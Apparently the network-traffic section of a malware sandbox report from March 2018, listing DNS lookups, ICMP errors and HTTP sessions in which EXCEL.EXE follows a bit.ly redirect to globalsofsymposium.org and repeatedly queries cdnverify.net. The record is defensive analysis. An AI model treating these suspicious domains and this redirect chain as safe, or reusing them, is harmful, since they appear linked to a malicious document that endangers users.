Mar 1, 2018 09:57:38.779525042 CET	53	58138	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:39.632617950 CET	53	58138	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:44.536007881 CET	60708	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:45.436494112 CET	53	60708	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:47.946141958 CET	65034	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.050041914 CET	58653	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.184550047 CET	57327	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.195950031 CET	56352	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.318675041 CET	62091	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.410285950 CET	63509	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.588556051 CET	53	65034	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:48.626533031 CET	51492	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.630852938 CET	62750	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.048588037 CET	58653	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.052361012 CET	53	58653	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.093451977 CET	58913	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.179075003 CET	57327	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.188642025 CET	56352	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.285398006 CET	53	57327	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.305655956 CET	63309	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.318974018 CET	62091	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.409051895 CET	63509	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.620362997 CET	51492	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.630023956 CET	62750	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.673552036 CET	53	56352	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.716496944 CET	52316	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.870814085 CET	53	62091	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.884939909 CET	65236	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.090126038 CET	58913	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.119647026 CET	53	63509	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.146027088 CET	55904	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.301424026 CET	63309	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.332331896 CET	53	51492	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.505001068 CET	53	62750	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.678735018 CET	53	58653	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.711474895 CET	52316	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.839226961 CET	53	58913	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.880867004 CET	65236	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.141469955 CET	55904	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.261076927 CET	53	57327	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.301836967 CET	63309	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.436458111 CET	53	56352	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.632910967 CET	53	63309	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.712451935 CET	52316	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.827815056 CET	53	62091	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.882541895 CET	65236	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:52.101938009 CET	53	63509	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:52.146043062 CET	55904	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:52.352705956 CET	53	51492	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:52.581501961 CET	53	62750	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:52.804613113 CET	53	52316	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.104418039 CET	53	65236	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.322925091 CET	53	58913	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.508179903 CET	53	55904	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.700113058 CET	53	63309	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.871021986 CET	53	52316	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:54.326128960 CET	53	65236	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:54.507950068 CET	53	55904	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:54.673943043 CET	53	63309	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:55.259068012 CET	53	52316	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:55.425334930 CET	53	65236	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:55.583376884 CET	53	55904	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:59.707160950 CET	55581	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:00.486648083 CET	53	55581	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:08.090728998 CET	57178	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:09.087626934 CET	57178	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:09.124780893 CET	53	57178	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:09.842176914 CET	53	57178	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:15.794493914 CET	62406	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:16.788600922 CET	62406	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:17.755737066 CET	53	62406	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:18.240710974 CET	53	62406	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:18.476654053 CET	58563	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:19.472383976 CET	58563	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:20.410403967 CET	53	58563	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:20.415878057 CET	49408	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:21.415131092 CET	49408	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:21.494505882 CET	53	58563	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:22.416321993 CET	49408	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:24.052798033 CET	53	49408	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:24.477866888 CET	53	49408	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:25.453747034 CET	53	49408	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:32.896441936 CET	61609	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:33.892751932 CET	61609	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:34.894555092 CET	61609	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:34.973774910 CET	53	61609	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:34.977785110 CET	59433	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:35.981460094 CET	59433	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:36.197613955 CET	53	61609	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:36.977011919 CET	59433	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:38.092425108 CET	53	61609	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:38.785633087 CET	53	59433	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:39.213612080 CET	53	59433	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:40.099805117 CET	53	59433	8.8.8.8	192.168.2.2

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Mar 1, 2018 09:56:37.867938042 CET	192.168.2.2	8.8.8.8	cffc	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:56:48.529269934 CET	192.168.2.2	8.8.8.8	cfef	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:56:50.755326986 CET	192.168.2.2	8.8.8.8	d008	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:56:51.513276100 CET	192.168.2.2	8.8.8.8	d000	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:56:57.743148088 CET	192.168.2.2	8.8.8.8	d00a	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:56:59.264292955 CET	192.168.2.2	8.8.8.8	cff8	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:00.425683975 CET	192.168.2.2	8.8.8.8	cff8	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:14.301424026 CET	192.168.2.2	8.8.8.8	d00c	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:15.524776936 CET	192.168.2.2	8.8.8.8	d00c	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:18.209239960 CET	192.168.2.2	8.8.8.8	cfef	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:19.339304924 CET	192.168.2.2	8.8.8.8	cfef	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:23.655689001 CET	192.168.2.2	8.8.8.8	d009	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:24.604428053 CET	192.168.2.2	8.8.8.8	d009	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:25.564681053 CET	192.168.2.2	8.8.8.8	d009	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:26.740071058 CET	192.168.2.2	8.8.8.8	d009	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:28.063837051 CET	192.168.2.2	8.8.8.8	d009	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:29.412941933 CET	192.168.2.2	8.8.8.8	d009	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:30.052983046 CET	192.168.2.2	8.8.8.8	d009	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:39.632978916 CET	192.168.2.2	8.8.8.8	cfef	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:50.678878069 CET	192.168.2.2	8.8.8.8	d002	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:51.436585903 CET	192.168.2.2	8.8.8.8	cffd	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:52.581660986 CET	192.168.2.2	8.8.8.8	cfef	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:53.700185061 CET	192.168.2.2	8.8.8.8	cffd	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:54.508006096 CET	192.168.2.2	8.8.8.8	d000	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:57:55.583554029 CET	192.168.2.2	8.8.8.8	d000	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:09.842432022 CET	192.168.2.2	8.8.8.8	cfef	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:18.240927935 CET	192.168.2.2	8.8.8.8	cfef	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:21.494815111 CET	192.168.2.2	8.8.8.8	d010	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:24.478105068 CET	192.168.2.2	8.8.8.8	d010	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:25.454034090 CET	192.168.2.2	8.8.8.8	d010	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:36.197732925 CET	192.168.2.2	8.8.8.8	d003	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:38.092726946 CET	192.168.2.2	8.8.8.8	d003	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:39.213795900 CET	192.168.2.2	8.8.8.8	d003	(Port unreachable)	Destination Unreachable
Mar 1, 2018 09:58:40.099951982 CET	192.168.2.2	8.8.8.8	d003	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 1, 2018 09:56:35.684814930 CET	192.168.2.2	8.8.8.8	0xb390	Standard query (0)	google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:36.692917109 CET	192.168.2.2	8.8.8.8	0xb390	Standard query (0)	google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:46.234924078 CET	192.168.2.2	8.8.8.8	0x10f6	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:47.231744051 CET	192.168.2.2	8.8.8.8	0x10f6	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:48.285332918 CET	192.168.2.2	8.8.8.8	0xd1db	Standard query (0)	www.maritime-recon.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:49.282732010 CET	192.168.2.2	8.8.8.8	0xd1db	Standard query (0)	www.maritime-recon.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:49.593730927 CET	192.168.2.2	8.8.8.8	0x56c8	Standard query (0)	www.janes.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:49.750072956 CET	192.168.2.2	8.8.8.8	0x3498	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:50.744911909 CET	192.168.2.2	8.8.8.8	0x3498	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:51.518181086 CET	192.168.2.2	8.8.8.8	0x56c8	Standard query (0)	www.janes.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:53.685393095 CET	192.168.2.2	8.8.8.8	0xc9bd	Standard query (0)	www.singaporeairshow.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:55.219652891 CET	192.168.2.2	8.8.8.8	0xc9bd	Standard query (0)	www.singaporeairshow.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:55.326189041 CET	192.168.2.2	8.8.8.8	0x9326	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:56.322947025 CET	192.168.2.2	8.8.8.8	0x9326	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:57.324069977 CET	192.168.2.2	8.8.8.8	0x9326	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:11.162659883 CET	192.168.2.2	8.8.8.8	0x10f6	Standard query (0)	www.globalsofsymposium.org	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:12.156527042 CET	192.168.2.2	8.8.8.8	0x10f6	Standard query (0)	www.globalsofsymposium.org	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:13.158276081 CET	192.168.2.2	8.8.8.8	0x10f6	Standard query (0)	www.globalsofsymposium.org	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:14.191948891 CET	192.168.2.2	8.8.8.8	0x6739	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:15.209913969 CET	192.168.2.2	8.8.8.8	0x6739	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:16.211612940 CET	192.168.2.2	8.8.8.8	0x6739	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:37.778156996 CET	192.168.2.2	8.8.8.8	0x4445	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:38.773844004 CET	192.168.2.2	8.8.8.8	0x4445	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:44.536007881 CET	192.168.2.2	8.8.8.8	0x2e30	Standard query (0)	ipv4.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:48.318675041 CET	192.168.2.2	8.8.8.8	0x6703	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:48.410285950 CET	192.168.2.2	8.8.8.8	0x3c35	Standard query (0)	pki.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:48.630852938 CET	192.168.2.2	8.8.8.8	0xf82	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:49.318974018 CET	192.168.2.2	8.8.8.8	0x6703	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:49.409051895 CET	192.168.2.2	8.8.8.8	0x3c35	Standard query (0)	pki.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:49.630023956 CET	192.168.2.2	8.8.8.8	0xf82	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:49.884939909 CET	192.168.2.2	8.8.8.8	0x9c01	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:50.146027088 CET	192.168.2.2	8.8.8.8	0xf06	Standard query (0)	pki.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:50.880867004 CET	192.168.2.2	8.8.8.8	0x9c01	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:51.141469955 CET	192.168.2.2	8.8.8.8	0xf06	Standard query (0)	pki.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:51.882541895 CET	192.168.2.2	8.8.8.8	0x9c01	Standard query (0)	clients1.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:52.146043062 CET	192.168.2.2	8.8.8.8	0xf06	Standard query (0)	pki.google.com	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:59.707160950 CET	192.168.2.2	8.8.8.8	0xf955	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:08.090728998 CET	192.168.2.2	8.8.8.8	0x9b88	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:09.087626934 CET	192.168.2.2	8.8.8.8	0x9b88	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:15.794493914 CET	192.168.2.2	8.8.8.8	0xeb87	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:16.788600922 CET	192.168.2.2	8.8.8.8	0xeb87	Standard query (0)	cdnverify.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	CName	Address	Type	Class
Mar 1, 2018 09:56:37.174513102 CET	8.8.8.8	192.168.2.2	0xb390	No error (0)	google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:37.867747068 CET	8.8.8.8	192.168.2.2	0xb390	No error (0)	google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:47.479697943 CET	8.8.8.8	192.168.2.2	0x10f6	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:48.529203892 CET	8.8.8.8	192.168.2.2	0x10f6	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:50.271864891 CET	8.8.8.8	192.168.2.2	0xd1db	No error (0)	www.maritime-recon.com		109.108.140.110	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:50.755230904 CET	8.8.8.8	192.168.2.2	0xd1db	No error (0)	www.maritime-recon.com		109.108.140.110	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:51.002640963 CET	8.8.8.8	192.168.2.2	0x56c8	No error (0)	www.janes.com		170.207.225.82	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:51.194181919 CET	8.8.8.8	192.168.2.2	0x3498	No error (0)	www.google.com		172.217.3.164	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:51.513185978 CET	8.8.8.8	192.168.2.2	0x3498	No error (0)	www.google.com		172.217.3.164	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:52.243382931 CET	8.8.8.8	192.168.2.2	0x56c8	No error (0)	www.janes.com		170.207.225.82	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:55.169131994 CET	8.8.8.8	192.168.2.2	0xc9bd	No error (0)	www.singaporeairshow.com		45.118.134.126	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:57.743043900 CET	8.8.8.8	192.168.2.2	0xc9bd	No error (0)	www.singaporeairshow.com		45.118.134.126	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:58.800394058 CET	8.8.8.8	192.168.2.2	0x9326	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Mar 1, 2018 09:56:59.264214039 CET	8.8.8.8	192.168.2.2	0x9326	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:00.425441027 CET	8.8.8.8	192.168.2.2	0x9326	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:13.158828020 CET	8.8.8.8	192.168.2.2	0x10f6	No error (0)	www.globalsofsymposium.org		45.33.77.71	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:14.301306009 CET	8.8.8.8	192.168.2.2	0x10f6	No error (0)	www.globalsofsymposium.org		45.33.77.71	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:15.524403095 CET	8.8.8.8	192.168.2.2	0x10f6	No error (0)	www.globalsofsymposium.org		45.33.77.71	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:16.825757027 CET	8.8.8.8	192.168.2.2	0x6739	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:18.208877087 CET	8.8.8.8	192.168.2.2	0x6739	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:19.339163065 CET	8.8.8.8	192.168.2.2	0x6739	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:38.779525042 CET	8.8.8.8	192.168.2.2	0x4445	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:39.632617950 CET	8.8.8.8	192.168.2.2	0x4445	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:45.436494112 CET	8.8.8.8	192.168.2.2	0x2e30	No error (0)	ipv4.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:49.870814085 CET	8.8.8.8	192.168.2.2	0x6703	No error (0)	clients1.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:50.119647026 CET	8.8.8.8	192.168.2.2	0x3c35	No error (0)	pki.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:50.505001068 CET	8.8.8.8	192.168.2.2	0xf82	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:51.827815056 CET	8.8.8.8	192.168.2.2	0x6703	No error (0)	clients1.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:52.101938009 CET	8.8.8.8	192.168.2.2	0x3c35	No error (0)	pki.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:52.581501961 CET	8.8.8.8	192.168.2.2	0xf82	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:53.104418039 CET	8.8.8.8	192.168.2.2	0x9c01	No error (0)	clients1.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:53.508179903 CET	8.8.8.8	192.168.2.2	0xf06	No error (0)	pki.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:54.326128960 CET	8.8.8.8	192.168.2.2	0x9c01	No error (0)	clients1.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:54.507950068 CET	8.8.8.8	192.168.2.2	0xf06	No error (0)	pki.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:55.425334930 CET	8.8.8.8	192.168.2.2	0x9c01	No error (0)	clients1.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:57:55.583376884 CET	8.8.8.8	192.168.2.2	0xf06	No error (0)	pki.google.com		172.217.3.174	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:00.486648083 CET	8.8.8.8	192.168.2.2	0xf955	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:09.124780893 CET	8.8.8.8	192.168.2.2	0x9b88	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:09.842176914 CET	8.8.8.8	192.168.2.2	0x9b88	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:17.755737066 CET	8.8.8.8	192.168.2.2	0xeb87	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)
Mar 1, 2018 09:58:18.240710974 CET	8.8.8.8	192.168.2.2	0xeb87	Name error (3)	cdnverify.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.janes.com

bit.ly

www.globalsofsymposium.org

clients1.google.com

pki.google.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.2	49166	170.207.225.82	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 1, 2018 09:56:51.520142078 CET	11	OUT	GET /events?page=1 HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office) Accept-Encoding: gzip, deflate Host: www.janes.com Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.2	49168	67.199.248.11	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 1, 2018 09:56:58.803955078 CET	55	OUT	GET /18GSS_Janes HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office) Accept-Encoding: gzip, deflate Host: bit.ly Connection: Keep-Alive
Mar 1, 2018 09:57:11.061445951 CET	132	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 01 Mar 2018 08:57:09 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Cache-Control: private, max-age=90 Location: http://www.globalsofsymposium.org/us#1 Set-Cookie: _bit=i218V9-8c36428902e8af3797-00w; Domain=bit.ly; Expires=Tue, 28 Aug 2018 08:57:09 GMT Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 73 6f 66 73 79 6d 70 6f 73 69 75 6d 2e 6f 72 67 2f 75 73 23 31 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="http://www.globalsofsymposium.org/us#1">moved here</a></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.2	49169	45.33.77.71	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Mar 1, 2018 09:57:13.163481951 CET	153	OUT	GET /us HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: www.globalsofsymposium.org
Mar 1, 2018 09:57:15.524461985 CET	159	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 01 Mar 2018 08:57:13 GMT Server: Apache/2.4.18 (Ubuntu) Cache-Control: no-cache Vary: Accept-Encoding Content-Encoding: gzip X-XSS-Protection: 1; mode=block X-Request-Id: 73c23dce-b2e5-4642-ba99-1cd55d1edcbc X-Runtime: 0.014711 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Powered-By: Phusion Passenger 5.1.12 Set-Cookie: _eventpower-tools_sessions=K3VSS1o5N2pxcko4Sy9DdDRMd09rOXMzcVBpb0k5MVVaNXZ5dWxJMVBJRDltQlRLUUk5bzNxVW96U2VsRUpBQ3paZWJsN0xvdnJleFRpdmd3MitST2c9PS0tTEEzYUNNQm10MG10YThuMGhDMUJ3QT09--d6f044462ca91c1008d378a8e730bdadeaa3c9df; path=/; HttpOnly Location: https://www.globalsofsymposium.org/us/us Status: 301 Moved Permanently Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 Data Raw: 61 0d 0a 1f 8b 08 